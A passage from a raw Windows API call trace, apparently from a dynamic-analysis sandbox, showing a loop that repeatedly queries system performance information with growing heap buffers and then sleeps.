0x29585b8 [0236.763] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.764] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.764] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.767] Sleep (dwMilliseconds=0x110) [0236.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.783] Sleep (dwMilliseconds=0x110) [0236.834] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.834] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.835] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.835] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.835] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.835] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.835] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.835] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.836] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.836] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.837] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.837] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.837] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.837] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.838] Sleep (dwMilliseconds=0x110) [0236.855] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.855] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.856] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.856] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.856] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.857] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.857] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.857] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.857] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.857] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.857] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.862] Sleep (dwMilliseconds=0x110) [0236.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.879] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.879] Sleep (dwMilliseconds=0x110) [0236.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.895] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.895] Sleep (dwMilliseconds=0x110) [0236.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.910] Sleep (dwMilliseconds=0x110) [0236.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.946] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.947] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.947] Sleep (dwMilliseconds=0x110) [0236.950] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.950] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.951] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.951] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.954] Sleep (dwMilliseconds=0x110) [0236.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0236.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0236.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0236.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.989] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0236.990] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.993] Sleep (dwMilliseconds=0x110) [0236.998] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0236.998] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0236.999] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0236.999] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0236.999] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.000] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0237.000] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.000] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0237.000] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0237.001] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0237.001] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.001] Sleep (dwMilliseconds=0x110) [0237.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0237.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0237.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0237.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0237.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0237.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0237.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.020] Sleep (dwMilliseconds=0x110) [0237.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0237.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0237.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0237.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0237.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0237.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.067] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0237.068] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.068] Sleep (dwMilliseconds=0x110) [0237.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0237.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0237.082] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0237.082] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0237.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.083] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0237.083] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0237.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0237.083] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 